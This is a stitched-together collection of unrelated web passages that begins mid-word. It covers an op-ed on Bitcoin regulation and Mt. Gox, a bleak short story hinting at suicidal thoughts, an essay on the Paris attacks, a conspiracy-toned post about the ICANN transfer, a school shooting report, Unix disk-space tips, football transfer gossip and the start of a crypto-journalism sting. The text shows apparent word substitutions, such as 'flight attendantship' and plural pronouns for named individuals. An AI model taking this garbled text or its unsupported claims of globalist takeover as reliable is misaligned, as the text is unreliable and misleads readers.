sing,'' says writer Chidananda Sali.The name comes from ‘Kooguva Kallu' (stones that make a pleasant sound when river water strikes them), they say.‘‘The sound wasn't produced by river water but by people who wanted to communicate with villagers in far-off places,'' explains S K Aruni, assistant director of Indian Council of Historical Research.‘‘In ancient times, people would send signals to far-off villages by hitting rocks with small sonorous stones. This produced cup-like marks in the rocks. Prehistoric rocks with such cup marks are found in several places in the Krishna river basin, such as Watkal, Hunasagi, Hebbal Burj and other villages in Gulbarga and Raichur districts. So, it's possible that a village with such rocks was called Kooguva Kallu,'' they add.
The Woman Who Saved Mt. Gox Herself
How massive regulatory failure inflated the failure of Mt. Gox.
March 1, 2014
[Note: My company is the plaintiff in a lawsuit involving many of the companies discussed below. I have never owned any Bitcoins, nor used any Bitcoin exchange, and neither has my company.]
One day after the bankruptcy of Mt. Gox, the former top Bitcoin exchange, questions are being raised in major media publications as to whether or not virtual currencies should be regulated. The Washington Post reports "Mt. Gox collapse spurs calls to regulate Bitcoin." The PBS NewsHour asks "Will Mt. Gox's missing money prompt regulation on Bitcoin?"
They might as well ask whether the advent of automobiles will prompt the use of "traffic lights" in 2014. What both of these venerable media establishments do not seem to realize—and they're far from the only ones—is that in the United States, Bitcoin is already regulated. It is heavily regulated, in fact. A complex maze of forty-seven state and at least ten federal laws and numerous federal regulations combine to regulate Bitcoin. It's so complicated, however, that a Gawker Media reporter recently dismissed via Twitter a critic's suggestion that Bitcoin is regulated with "now you're hedging a lot, I'm not even really sure what argument you're attempting to make." The argument their critic was rightly trying to make was that the media coverage has been, in the critic's words, "godawful."
The media does the public a major disservice when it rushes to report on a phenomenon it barely understands, and if the media's understanding of Bitcoin is poor, its understanding of the regulatory regime surrounding it is far worse. In another example of media tumult, the recent story that Fed Chairwoman Janet Yellen testified before Congress stating that the Fed had no authority to regulate Bitcoin was taken by some as a kind of surprise victory indicating that the federal government would allow Bitcoin to "continue" unregulated. What Yellen actually said was that the Federal Reserve Board of Governors specifically, at this present time, lacks Congressional authority to regulate Bitcoin because that Congressional authority has already been delegated elsewhere, specifically, to the United States Department of the Treasury's FinCEN division and the various states. This is just about the opposite of what many think they said.
So with all of this regulation, why did Mt. Gox still fail? On the surface, it might seem as though it failed because it was located in Japan, which is clearly not in the United States. The reality is that location of any business is irrelevant so long as the customers are in the United States. With Mark Karpeles in charge, Mt. Gox may have been on track to fail no matter what. But Mt. Gox failed with millions of United States dollars missing from its accounts because regulators in the United States turned a blind eye even they were warned again, and again, and again.
Money doesn't just get from Wisconsin and San Francisco to Tokyo by magic. Our financial institutions are carefully interconnected, and in order to make international payments of the traditional sort, one typically has to make a concerted effort and pay sizable fees. Ironically, this is one of the problems Bitcoin enthusiasts claim that the technology solves—but you still have to start somewhere.
In the case of Mt. Gox, and the Silk Road as well, that somewhere was for many years a company called Dwolla in the middle of Iowa. Dwolla's founder, Ben Milne, was featured on the cover of the MIT Technology Review as a brilliant innovator, but about the time that their picture was appearing on airport newsstands nationwide, Ben was in a lot of trouble. Along with about twenty other Bitcoin-related companies and investors, Dwolla had received a subpoena for information from the New York Department of Financial Services.
New York wasn't the only state that should have been curious about Dwolla. In 2011, my company, Think Computer Corporation, filed complaints about 34 companies with the then-Department of Financial Institutions of the State of California (DFI), Dwolla among them. The problem was that California's DFI wouldn't tell me how much capital Think would need to apply for a money transmission license, and had threatened to put me in jail personally if we continued to operate the mobile payment system I had worked on for three years. Meanwhile, DFI was letting all of Think's competitors do whatever they wanted, whether they had a license or not.
Dwolla had initially had an Iowa money transmission license, but it relinquished it when it discovered, likely thanks to some clever lawyering, that it could simply trick the regulatory world into thinking that it qualified for a loophole: Dwolla simply started calling itself an "agent" of a financial institution. So long as it could keep the regulators off its back, it could continue funneling money to Mt. Gox in Japan through the use of a special Dwolla account belonging to Mt. Gox's Delaware-based subsidiary, Mutum Sigillum LLC.
The trick worked. To this day, no one has reported on the enormous red flag that has been displayed in plain sight for all the world to see on Dwolla's home page for months: its "Important information about Dwolla's Financial Partner." It reads as follows:
Financial institutions play an important role in the Dwolla network. Dwolla, Inc. is an agent of Veridian Credit Union and all funds associated with your account in the Dwolla network are held in a pooled account at Veridian Credit Union. These funds are not eligible for individual insurance, and may not be eligible for share insurance by the National Credit Union Share Insurance Fund. Dwolla, Inc. is the operator of a software platform that communicates user instructions for funds transfers to Veridian Credit Union.
What Dwolla is attempting to do with this statement is qualify for two loopholes at once: one on the federal level that allows software vendors, or "payment processors," to avoid being considered money services businesses; and another on the state level that exempts banks, credit unions, and their agents from money transmission laws. Unfortunately, Dwolla's disclaimer is so convoluted it ends up being self-contradictory.
Agents of other companies do work on their behalf. An agent of a bank, such as a company that resells credit card processing services, actually brings customers into that bank. The revenues from those customers go to the bank, and the costs associated with their transactions appear on the bank's balance sheet as well. The agent may receive a commission, but fundamentally the bank's interests come first.
Dwolla's disclaimer references a "pooled account." Pooled accounts are used by money transmitters to store assets belonging to a number of customers all in one place, while a general ledger (usually in the form of computer software) keeps track of whose funds belong to whom. In other words, there would be no need to use a pooled account unless the funds belonged to Dwolla—which means that Dwolla is not an agent of anyone at all. It's a money transmitter.
When the United States Department of Homeland Security seized Mutum Sigillum LLC's Dwolla account over the summer of 2013, it left Dwolla the company alone. But it shouldn't have. Dwolla's relationship with Veridian Credit Union had already come under scrutiny by industry publication PaymentSource in November, 2012.
With Dwolla operating as an unlicensed money transmitter, the only entity left to scrutinize was Veridian. This small credit union in Des Moines was responsible for funneling potentially hundreds of millions of dollars to Mt. Gox and the Silk Road through its "strange symbiosis" with Dwolla. The individual in charge of overseeing Veridian was (and remains) JoAnn Johnson, Superintendent of Credit Unions with the Iowa Division of Credit Unions. Prior to their role in Iowa's government, they were the chairperson of the NCUA, the National Credit Union Administration, or the FDIC equivalent for credit unions.
On November 1, 2013, three days after Dwolla quietly told its customers that it would no longer handle Bitcoin-related transactions, I filed a formal complaint with the NCUA about Veridian Credit Union and its relationship with Dwolla, which I asserted was being falsely advertised. Since Veridian has a state charter, the complaint was forwarded to the Iowa Division of Credit Unions and the Consumer Financial Protection Bureau, which determined that it did not have any jurisdiction. On December 2, 2013, I received a written reply to my complaint from JoAnn Johnson herself. It stated:
"We are concerned that your complaint appears to make unsubstantiated allegations. You have not provided evidence of any statutory or regulatory violation by Veridian Credit Union. There is no regulatory or statutory infraction by having Dwolla act as a legal agent of Veridian Credit Union. The credit union is examined regulary, including for Bank Secrecy Act compliance. Please be aware that false statements against the credit union, without any basis in fact, may be a violation of Iowa Code §533.508(2), which prohibits the malicious or intentionally deceptive circulation of false statements which may otherwise injure or tend to injure the business or goodwill of a state credit union."
In other words, in retaliation for filing a confidential complaint through proper channels about a financial institution involved (though not directly, of course) in the loss of approximately $500 million, that institution's regulator came back and threatened me with what would seem to be carefully-worded criminal charges.
While JoAnn Johnson could have taken my complaint and investigated Veridian's activity with regard to Dwolla, Mt. Gox, and the warrant obtained by the Department of Homeland Security, they instead did nothing except try to shut me up. The question we should all be asking is, why? Did they know something we didn't?
So I reported them to the United States Department of Justice, which in turn sent my letter to the Federal Bureau of Investigation.
I don't know if anything will come of my complaint. But I do know that the failure of Mt. Gox, while perhaps not completely preventable, could have been mitigated considerably if Johnson had done their job in Iowa.
Of course, Johnson is not alone in their utter incompetence as a financial regulator. They have good company in virtually every state in the union, none of which took action despite Mt. Gox's nationwide reach. I have written in the past in considerable depth about the failings of California's DFI, which is now the Department of Business Oversight, run by Washington Mutual's former chief lobbyist, Jan Lynn Owen.
The fact of the matter is that it's time to fix the non-bank regulatory system so that incidents ranging from MF Global to Peregrine Financial to Mt. Gox can be avoided. Bitcoin doesn't need special treatment from New York. It needs the same treatment as every other financial instrument, and that treatment needs to come from Washington.
To my knowledge, I am the only individual or company representative who has proposed a detailed framework to reform non-bank financial regulation. The entrepreneurs and investors hoping to profit from Bitcoin, such as the founders of Coinbase and now the unfortunately-named Buttercoin (actually called Digital Currencies FinTech Company, Inc.), have been too busy trying to bring Mt. Gox's customers into their own illegal operations to bother talking to Congress about fixing the laws that would protect them. They consistently refuse to answer questions about why their companies are unlicensed. The regulators consistently refuse to answer questions about why they do nothing. It's a sad state of affairs.
We should regulate Bitcoin, and we have. We've just done it in such an asinine and confusing manner, that it encourages, rather than prevents, financial fraud.
They didn't react to my behaviour. Nor did they express any contempt. But all I could hear in their footsteps and the saintly silence with which they worked, all I could hear was reaction and contempt.
I am a child of my mother. My age is 22, and I have no job. Not because I can't have one but because I don't want one. Most of the jobs that are up for grabs as they like to call it are jobs that won't satisfy me. What's the point in working for a job where you find everything but joy?
My daily routine shuffles between reading and writing locked in my room. The only outside appearance I have is during breakfast, lunch and dinner and lately, those appearances have gone down to none. It's been 3 days holed up in my room doing nothing but reading philosophies that speak of individuality and of an ideal soul that works for themselves and their happiness. I do that but I find no happiness in that. It's been 3 days since I've seen my mother's face. All I hear is a voice and I can no longer put a face on it. The voice first was eager to get me out, then it grew restless, then it grew monotonous, then tired and then… defeated.
I sleep exactly at 2:15 AM because it takes me exactly 15 minutes to sleep. The clock no longer seems movable, it seemed to be a part of the furniture it stands on. It glues onto it now. It dictates my routine. My time is on this clock. It ticks so I tick.
I no longer hear my mother's voice, I only hear sounds now. Sounds that express emotions they wanted to but couldn't. In their steps, I still hear that reaction, but no longer filled with hope. Speech is nothing but a frequency tuned to a dead channel. A thought comes and goes.
“Why did I choose a room with no balcony?”
The air becomes stale. The will to open the window is stale. The bars on the window are stale. Will I be in the will of my parents when they die? Who will die first? Them or… me?
Questions become all but a facade to make myself aware that my brain, it still functions. There no longer seems light inside the room, nothing but the light seeping through the parts the curtain can't curtail.
I'm awake. The mirror lays shattered and I no longer see myself. I can longer see the disappointment, the guilt, the awareness of my unawareness. I see myself through the shattered glasses, I see a version of me. Versions. Pieces. Pieces of me. Laid down on the ground. I sink down the floor. The tiles give me chills. I become aware of the hair on my skin rising like buildings that I wanted to raise.
I rise up. No, only my tired eyes, they rise. They watch the fan swinging its blades in a circular motion and then suddenly it stops. It no longer swings. My eyes make an effort to look down at my table. I only see half of the clock. 10,11,12,1,2,. It shows 2 something AM or PM. Is it 2:15? I wait for the second hand to come up from the lower half. I need to know if it still moves. Does it still tick? Do I still have time? I wait. Wait. Waiting. Waiting. Wai….
Advertisements
Originally posted at TomDispatch.
Honestly, I don't know whether to rant or weep, neither of which are usual impulses for me. In the wake of the slaughter in Paris, I have the urge to write one of two sentences here: Paris changed everything; Paris changes nothing. Each is, in its own way, undoubtedly true. And here's a third sentence I know to be true: This can't end well.
Other than my hometown, New York, Paris is perhaps the city where I've felt most at ease. I've never been to Baghdad (where Paris-style Islamic State terror events are relatively commonplace); or Beirut, where they just began; or Syria's ravaged Aleppo (thank you, Bashar al-Assad of barrel-bomb terror fame); or Mumbai (which experienced an early version of such a terror attack); or Sana'a, the capital of Yemen, now partly destroyed by the U.S.-backed Saudi air force; or Kabul, where Taliban attacks on restaurants have become the norm; or Turkey's capital, Ankara, where Islamic State suicide bombers recently killed 97 demonstrators at a peace rally. But I have spent time in Paris. And so, as with my own burning, acrid city on September 11, 2001, I find myself particularly repulsed by the barbaric acts of civilian slaughter carried out by three well-trained, well-organized, well-armed suicide teams evidently organized as a first strike force from the hell of the Islamic State (IS) in Syria and Iraq.
The Paris attacks should not, however, be seen primarily as acts of revenge from a distinctly twisted crew, even though one of the murderers reportedly shouted, “You killed our brothers in Syria and now we are here.” Instead, they were clearly acts of calculated provocation meant to reshape our world in grim ways. Worse yet, their effectiveness was pre-guaranteed because, as has been true since 9/11, the leaders of such terror groups, starting with Osama bin Laden, have grasped the dynamics of our world, of what makes us tick and especially what provokes us into our own barbarous acts, so much better than our leaders, our militaries, or our national security states have understood them (or, for that matter, themselves).
Here in a nutshell is what bin Laden grasped before 9/11: with modest millions of dollars and a relatively small number of followers, they and their movement couldn't hope to create the world of their fervid dreams. If, however, they could lure the planet's “sole superpower” into stepping into their universe, military first, it would change everything and so do their work for him. And indeed (see: invasion of Afghanistan, invasion of Iraq), an operation mounted for an estimated $400,000 to $500,000, using 19 dedicated (mostly Saudi) followers armed only with paper cutters, did just that.
And it's never stopped since because, just as bin Laden dreamed, Washington helped loose al-Qaeda and its successor outfits from the constraints of a more organized, controlled world. In these last 14 years of failed wars and conflicts of every sort, American military power, aided and abetted by the Saudis, the British, the French, and other countries on a case-by-case basis, essentially fractured the Greater Middle East. It helped create five failed states (Afghanistan, Iraq, Libya, Syria, and Yemen), worlds in which terror groups could thrive and in the chaos of which they could attract ever more recruits.
Wiping Out the Gray Zones
Think of the Islamic State and various al-Qaeda crews as having developed (to steal a term from commentator John Feffer) “splinterlands” strategies. To continue to grow, they need the U.S. and its allies to lend them an eternally destructive hand to further smash the worlds around them. So in response to the Paris attacks, French President Francois Hollande's statement that “we will lead a war which will be pitiless” was just what the terror doctor ordered, as was the growing pressure in Washington for a “big military response” to Paris. The first French reprisal air strikes against IS's Syrian “capital,” Raqqa, were indeed launched within two days.
All of this is like manna from heaven for the Islamic State, the more “pitiless” the better. After all, that group's goal, as they write in their magazine and online, is “the extinction of the gray zone” in our world. In other words, they seek the sharpening of distinctions everywhere, which means the opening of abysses where complexity and interaction once existed. Their dream is to live in a black-and-white world of utter religious and political clarity (and calamity), while engaging in what American pundits like to term a “clash of civilizations.” And – what a joy for the Islamic State! – Republican presidential candidates are already responding to the Paris attacks, as Marco Rubio did, by calling for just such “a civilizational conflict with radical Islam.” As they put it, “This is not a grievance-based conflict. This is a clash of civilizations… And either they win, or we win.” Jeb Bush similarly responded: “This is an organized effort to destroy Western civilization and we need to lead in this regard.” The answer, of course, is “war.” Various Republican candidates are also now calling for only accepting Syrian Christians as refugees here. You can't be more black and white than that.
In the European context and with the destruction of those “gray zones” in mind, the Paris attacks should also be considered the Islamic State's first foray into the politics of the 2017 French presidential campaign. Think of those mass killings as a wholehearted endorsement of the extremist candidate Marine le Pen, whose poll numbers were already on the rise even before the attacks, and their anti-Muslim, anti-immigrant National Front Party.  They are now, in effect, IS's chosen candidate, the one most likely to go after gray zones. In the process, of course, pressure on France's large, increasingly isolated Muslim population will only increase.
Such attacks are guaranteed to put wind in the already billowing sails of far right-wing parties all across Europe. It should, for instance, have come as no surprise that, in the wake of the Paris attacks, Konrad Szymanski, the European affairs minister for Poland's new far-right government, almost instantly declared their country unlikely to abide by recently negotiated European Union (EU) quotas on accepting refugees from the Greater Middle East. And we're only going to see more of this in the post-Paris world. With the assistance of IS and other jihadist groups, the elimination of such gray areas in Europe could, in the end, help crack the EU open, while pushing France's Muslims into an even worse situation, which would, of course, mean more potential recruits for groups like the Islamic State.
In other words, from IS's point of view, the Paris attacks and other acts like them represent a potential horn of plenty. Sadly, it's not the only organization that will reap such benefits – and I'm not just referring to other jihadist outfits either. Such acts are, after a fashion, similarly useful in the Western world. Think of it as a kind of unspoken bargain between two “civilizations” from hell.
Take the United States, a place where, in the years since 9/11, the danger of being attacked by an Islamic terrorist could be slotted in somewhere between being “shot” by your dog and being shot by a toddler who has found a loaded, unlocked gun in your house, purse, or car. Among the many perils of American life from car crashes to suicide, E. coli illnesses to floods, injuries from crumbling infrastructure to mass killings by non-Islamic lone wolves, Islamic terrorism remains at the bottom of the barrel in the company of other frightening but rare events like shark attacks. Yet the American national security state has essentially been built and funded to protect you from that danger alone.
Put another way, the officials of that security state have bet the farm on the preeminence of the terrorist “threat,” which has, not so surprisingly, left them eerily reliant on the Islamic State and other such organizations for the perpetuation of their way of life, their career opportunities, their growing powers, and their relative freedom to infringe on basic rights, as well as for that comfortably all-embracing blanket of secrecy that envelops their activities. Note that, as with so many developments in our world which have caught them by surprise, the officials who run our vast surveillance network and its staggering ranks of intelligence operatives and analysts seemingly hadn't a clue about the IS plot against Paris (even though intelligence officials in at least one other country evidently did). Nonetheless, whether they see actual threats coming or not, they need Paris-style alarms and nightmares, just as they need local “plots,” even ones semi-engineered by FBI informers or created online by lone idiots, not lone wolves. Otherwise, why would the media keep prattling on about terrorism or presidential candidates keep humming the terror tune, and how, then, would public panic levels remain reasonably high on the subject when so many other dangers are more pressing in American life?
The relationship between that ever-more powerful shadow government in Washington and the Islamic terrorists of our planet is both mutually reinforcing and unnervingly incestuous. Both, of course, emerge as winners when the gray zones begin to disappear. When Paris is hit, after all, law enforcement agencies in the U.S. instantly increase their “alert levels”; the CIA director pushes back hard against “hand-wringing over intrusive government spying” and the minimalist restrictions on electronic surveillance put in place in recent years; the FBI heightens “its surveillance of Americans under investigation for apparent ties to the Islamic State”; and, among other things, more police patrols are sent out in major cities, while local law enforcement “vigilance” rises even in places like Niagara Falls, New York. In Los Angeles, post-Paris, extra patrols were typically sent “to ‘critical sites' and [the city's police department was] monitoring the ongoing situation, even though it said there were no known threats.”
The lack of obvious threats is, of course, beside the point when American “safety” is at stake! In the meantime, the road toward a more locked-down, secretive, governmentally intrusive, less democratic world is being well paved.
A Dance of Death
Think of this as a kind of global danse macabre in which ISIS attacks – eight committed guys, some possibly trained in combat in Syria or Iraq, with AK-47s, suicide vests, and rental cars – spread death, chaos, panic, and alarm in our world at next to no cost at all. In response, Washington and its allies engage in a big-budget version of the same, including intensified air campaigns which will, of course, end up taking out civilian targets and infrastructure.
Think of what the U.S. military does when it heads out to destroy those gray zones as the Kobane or Sinjar Strategy. Kobane was a largely Kurdish town on the Turkish border that IS militants besieged and partially took in 2014. They were driven back early this year by the same combination of forces that recently retook the town of Sinjar in northern Iraq: Kurdish fighters and American warplanes. By the time both were retaken, American bombs and Islamic State IEDs and booby-trapped houses had insured that those towns would be largely uninhabitable wrecks, littered with corpses and the skeletons of buildings.
Similarly, plans by the U.S. to intensify the bombing of those Syrian oilfields under the control of the Islamic state (to cut into its supply of funds) reflect a strategy that, whatever its immediate successes, is guaranteed to further wreck the infrastructure of the region. This will help ensure that, no matter what happens to the Islamic State, “Syria” or any state structure like it will be no more. Such acts of destruction, largely from the air, have been taking place across the Greater Middle East since 2001. From Libya to Syria, Iraq to Yemen, the Sinjar Strategy has demonstrably done little to bring success to the U.S. and its allies in their various wars. It has, however, helped create a zone of failed and increasingly fragile states. It has left uprooted populations leading skeletal lives in haunted lands that are also hunting grounds for extremists of every sort. Consider this the dream world of Osama bin Laden and Abu Bakr al-Baghdadi, as well as the perfect breeding ground for yet more extreme nightmares of our age. A dance of death indeed.
As it happens, I've barely ranted and not yet wept. If anything, on reaching the end of this piece, I find myself depressed. The future shouldn't be so easy to see or so repetitively predictable. And it's a terrible thing to know that, as the gray zones of our planet continue to disappear and wrecked worlds spread, the tempo of that dance of mutual death and destruction stands every chance of speeding up as the “music” only grows louder.
Tom Engelhardt is a co-founder of the American Empire Project and the author of The United States of Fear as well as a history of the Cold War, The End of Victory Culture.  They are a fellow of the Nation Institute and runs TomDispatch.com. Their latest book is Shadow Government: Surveillance, Secret Wars, and a Global Security State in a Single-Superpower World.
Follow TomDispatch on Twitter and join us on Facebook. Check out the newest Dispatch Book, Nick Turse's Tomorrow's Battlefield: U.S. Proxy Wars and Secret Ops in Africa, and Tom Engelhardt's latest book, Shadow Government: Surveillance, Secret Wars, and a Global Security State in a Single-Superpower World.
Copyright 2015 Tom Engelhardt
Read more by Tom Engelhardt
Is it being alarmist to predict that the end of the Internet as we know it is just about a done deal? That is the argument being made by many as one of the biggest stories of the decade – Obama's handover of the internet to globalist interests – is about to become a reality. While Barry is still stinging from that epic veto override of their attempt to protect the terrorist supporting House of Saud, one of their signature legacy accomplishments is about to go down while the media sleeps and the sheeple are obsessed with the breakup of Brangelina.
According to the Daily Caller “Obama Admin Wants To Surrender US Control Over Internet To Global Bureaucracy”:
The Obama administration is planning to relinquish American control over a central portion of Internet governance. The implications of this move range from control by an international bureaucracy to totalitarian regimes locking up entire portions of the Internet, according to experts. The National Telecommunications and Information Administration (NTIA) is in the process of transitioning flight attendantship of the Internet's domain name system (DNS) — the technical network that converts website address names into numbers — to a global entity. The DNS is essentially the “yellow pages” of web addresses. The transition is set to occur Oct. 1.
Conservative watchdog group Accuracy in Media (AIM) elaborates further in the article “Obama's Reckless Plan Threatens U.S. Oversight of Internet”:
The Obama administration is poised to surrender control of certain Internet functions to non-profit ICANN, the Internet Corporation for Assigned Names and Numbers, on October 1. According to Americans for Limited Government's senior editor Robert Romano, opposition to this Internet giveaway has united Republicans such as Senator Ted Cruz (R-TX) and presidential candidate Donald Trump. But questions remain as to whether or not the Republicans will unite sufficiently to insist language is included in a continuing resolution that will forbid the transfer of control. Senate Majority Leader Mitch McConnell (R-KY) actually stripped out this language from the continuing resolution, and a vote to end debate on the current language, which does not fix the ICANN issue, failed on September 27. This is the latest Obama administration scandal, one that threatens the integrity of the Internet. President Obama is seeking to cede oversight of Internet protocols to a multinational body, effectively ending unilateral American control over these functions. Romano writes that this is the “Last chance to save the free and open Internet.”
The surrender of American control over the internet is a key factor in the relentless push for a one-world corporate controlled government, right along with the Trans-Pacific Partnership (TPP) with it's secret court and sovereignty destroying provisions. The TPP is absolutely going to be passed in an Obama-Paul Ryan-Mitch McConnell collaboration in the lame duck session before the new POTUS takes office.
While the TPP is bad enough for the future of America – especially in terms of pure economics – it's the transfer of the internet into the hands of unaccountable globalists that should send a cold chill up the spines of those who value free speech. The free exchange of information that is enabled by the internet has become the elite's greatest enemy and now that a global awakening is occurring it is imperative that opposition to the so-called New World Order be put down like rabid dogs. While some are fighting the good fight – including Tricky Ted (probably for all the wrong reasons) – this thing is already a done deal barring some sort of miraculous awakening.
If Hillary Clinton is installed into the White House as the establishment plans, a savage, Soviet style crackdown on political opposition will commence nearly immediately. This is going to be made all the easier by Obama's big betrayal that will circumvent whatever remains of the functional court system in America.
It would probably be pretty accurate to say that thanks to the media blackout of news on this most important issue that 99.5 percent of Americans don't even know this is happening, what is even sadder is that it's probably safe to say that 98 percent could care less.
Four people were wounded in a shooting outside a Portland high school on Friday, throwing an area in the north end of the city into chaos as medical responders rushed to the scene and the police searched for someone believed to be involved with a local gang. A 16-year-old girl was hospitalized in critical condition and two young men, ages 17 and 20, were in serious condition. A 19-year-old woman was treated for a graze wound. The victims were able to run into the school after the attack, a police spokesperson said. Their names were not available. Rosemary Anderson High School, with about 200 students, is an alternative public school for students who have either been expelled from or dropped out of regular high school. The shootings occurred just after noon on an unseasonably warm and dry day when many students were outside, but a spokesperson for the Portland Police Bureau, Sgt. Pete Simpson, said it was not clear whether the victims were specifically targeted or just happened to be in the wrong place at the wrong time.
When working as a systems administrator, you'll always end up having to solve a file system full error in a hurry. Here are a few commands and hints to help you get out of it quickly on a UNIX like system.
df command
The df (disk free) command will report how much of each file system is used. You can combine this with with the sort command to get the fullest file systems at the end :
kattoo@roadrunner ~/Downloads $ df | sort -n -k 5,5 Filesystem 1K-blocks Used Available Use% Mounted on shm 2029696 0 2029696 0% /dev/shm /dev/sda6 1968588 3232 1865356 1% /tmp udev 10240 228 10012 3% /dev /dev/sda12 367628876 28899532 338729344 8% /files /dev/sda7 1989820 246300 1743520 13% /var /dev/sda9 1999932 260996 1738936 14% /usr/portage /dev/sda5 244176 52264 191912 22% / /dev/sda8 9990188 3161340 6828848 32% /usr /dev/sda11 99947736 32910756 67036980 33% /files/vservers /dev/sda10 3989912 1699372 2290540 43% /usr/portage/distfiles
The sort arguments are :
-n : order numerically
-k 5,5 : order by the 5th field
du command
When you found out that a specific file system is full, you need to quickly analyze which folders are the biggest.
You can use the du (disk usage) command. This command will report the space used by a directory and sub-directories. I usually run something like :
kattoo@roadrunner /usr/portage $ du -sk * | sort -n | tail -20 5711 x11-misc 6056 app-misc 6224 dev-ruby 6320 app-dicts 7219 profiles 7428 net-analyzer 7686 app-text 8112 media-plugins 8777 kde-base 8883 media-libs 8943 sys-apps 9764 dev-util 9986 media-sound 10955 dev-libs 11295 dev-python 11479 dev-java 11645 net-misc 17553 dev-perl 112556 metadata 1705976 distfiles
This will show the 20 largest files or directories. du will display the size of each directory and sub-directories by default. The -s switch will make du display only the grand total for each argument.
According to the results, you might want to go on repeating this command in the sub-directories, until you've narrowed down enough to find the culprit.
find command
The file system full error is more often than not due to a faulty script or program which logs are running wild due to a bug. This will usually lead to a huge file somewhere in a directory, hogging all the available space on the file system.
An easy way to spot it is to use the find command. The following snippet for example will search for files bigger than 10MB in the current directory and sub-directories and print the 10 largest ones :
kattoo@roadrunner /usr/portage $ find . -type f -size +10000000c -exec ls -l \{} \; | sort -n -k 5,5 | tail -10 -rw-rw-r-- 1 portage portage 23416703 Oct 1 10:07 ./distfiles/samba-3.0.37.tar.gz -rw-rw-r-- 1 portage portage 28749072 Jan 18 2008 ./distfiles/extremetuxracer-0.4.tar.gz -rw-rw-r-- 1 portage portage 46905557 Oct 16 17:20 ./distfiles/firefox-3.5.4.source.tar.bz2 -rw-rw-r-- 1 portage portage 46914620 Dec 2 05:32 ./distfiles/firefox-3.5.6.source.tar.bz2 -rw-rw-r-- 1 portage portage 50380241 Oct 2 11:47 ./distfiles/VirtualBox-3.0.8-53138-Linux_amd64.run -rw-rw-r-- 1 portage portage 50595281 Nov 17 10:44 ./distfiles/VirtualBox-3.0.12-54655-Linux_amd64.run -rw-rw-r-- 1 portage portage 59368714 Aug 8 02:10 ./distfiles/gcc-4.3.4.tar.bz2 -rw-rw-r-- 1 portage portage 61494822 Sep 10 00:34 ./distfiles/linux-2.6.31.tar.bz2 -rw-rw-r-- 1 portage portage 125384668 Oct 1 13:58 ./distfiles/qt-x11-opensource-src-4.5.3.tar.gz -rw-rw-r-- 1 portage portage 314942420 Jun 18 2008 ./distfiles/sauerbraten_2008_06_17_ctf_edition_linux.tar.bz2 kattoo@roadrunner /usr/portage $
I also like to filter out already compressed files, in order to collect the biggest files which I could compress to save some space with something like :
find . -type f -size +10000000c \! -name "*.Z" \! -name "*.gz" \! -name "*.bz2" -exec ls -l \{} \;
Tip : Set this as an alias in your profile by adding this to your .bashrc (if you're using bash … otherwise check your shell documentation) :
alias bigfiles='find . -type f -size +10000000c \! -name "*.Z" \! -name "*.gz" \! -name "*.bz2" -exec ls -l \{} \; | sort -n -k 5,5 | tail -10'
This will give you the 10 largest not-yet-compressed files in a single handy command.
Caveat
“Too many arguments” error :
If you are working with directory holding an important number of files, you might get a “Too many arguments” error when using a star expansion (like in the du -sk * example above).
This is actually not the du command complaining, but the shell which gets too much data when expanding the star. When this happens, you are usually better off using the find command as explained above.
Another possibility is to pipe the output of find to the xargs command. Basically xargs will take everything on the standard input and give it as arguments to the specified command.
Deleting / compressing a file which is still open
Also beware of this : if you delete or compress a file which is still being open by a process, then the space this file use won't get freed before the process actually closes the file (I'll explain why in a different post, this is an interesting topic on its own 🙂 ).
If you deleted or compressed the file (so basically the big file disappeared or was replaced by a compressed version), but the space doesn't get freed (which you can check with df ), then you can bet that a process is still holding the file open. You can spot this with tools like lsof or fuser. Those tools vary greatly according to which variant of Unix you're running. On IBM's AIX, fuser had a handy -d option to spot files on the file system which have a link count of 0 and it will report the PID of the attached processes.
Better check those tools' man pages before you run into this situation !
A word to the wise
Those recipes will help you to find a way out when you are already facing a file system full problem. The best is of course to avoid them in the first place … The following ideas are a good start :
Set alerts to have an early warning and let you deal with it before applications start crashing. Tools like Nagios would be your friends here, but homemade scripts running from cron and sending emails might be enough.
to have an early warning and let you deal with it before applications start crashing. Tools like Nagios would be your friends here, but homemade scripts running from cron and sending emails might be enough. Check the trends : You can use tools like cacti to graph the space occupation of your file systems over the time. This will let you anticipate when you'll need to add more disks or if your log rotation and/or file archiving policies are adequate.
More ideas ? Tips to share ? Hit the comments !
Get the biggest football stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Carlos Queiroz has emerged as a major contender to be QPR's next permanent manager.
It is believed that QPR made enquiries about the former Real Madrid boss, who is currently in charge of Iran's national team, before
Chris Ramsey was placed in charge until the end of the season.
Ramsey has a genuine chance of being offered the job on a permanent basis if Rangers enjoy a strong finish to their Premier League campaign - and they have major support from within the dressing-room.
Yet owner Tony Fernandes has been considering options with Queiroz, who had two spells as Sir Alex Ferguson's assistant at Manchester United, a serious candidate.
The 61-year-old Portuguese is considered to fit the bill as the hands-on 'head coach' figure Fernandes is seeking to replace Harry Redknapp.
(Image: Amin M. Jamali)
They also have a good track record of developing young players, which would be a prerequisite for any new QPR boss.
Sources within the club are sceptical about Fernandes's claim on Twitter that they had identified their 'dream manager' before Ramsey's interim appointment.
But it is understood that Queiroz is being considered and that they may be keen to return to English football.
Queiroz is under contract with Iran, meaning that no speedy appointment could have been made in the wake of Redknapp's resignation three weeks ago.
But the experienced Portuguese may be open to a summer move after the nation's Asian Cup campaign ended in a quarter-final defeat by Iraq in Australia last month.
When I read news sites on the Internet I have the expectation that they are being honest.
Journalists who conduct themselves honestly prove themselves worthy of trust. — NPR Ethics Handbook
I've been trying to write stories about Bitcoin in the most honest and transparent way possible. I have suspected for some time though that this isn't always the case of my peers though.
Cash for news coverage: It's what Rosental Alves, director of the Knight Center for Journalism in the Americas at the University of Texas, calls “the dark part of journalism”–and it happens every day somewhere in the world. — Via CIMA Research Report: Cash for Coverage
How many of the Bitcoin news sites are you reading that are accepting cash for coverage? How many aren't fairly disclosing investments?
These are the sort of questions I have decided to set out and determine with a Chris Hansen style sting. The plan is simple, email various cryptocurrency “news” sites and see which ones accept cash for coverage.
You might be wondering why this is an issue? Should writers not be paid for the work they produce. Absolutely, journalists and writers should be paid — they just shouldn't be paid by the people they are covering.
So, I went undercover. A freshly created email address and a large list of sites it was time to see who was reporting honestly and who wasn't and expose that to my readers.
Sites that accept cash for coverage should just not be trusted. Once a “journalist” accepts cash of any sort to write a piece they are biased and will write more positive things. Sometimes — even worse some of these so-called “journalists” will extort companies and allow them to not have a negative piece published if they simply pay.
To get things started I decided to just be outright with my offer for cash. Emailing several sites with the following message….
Hi!
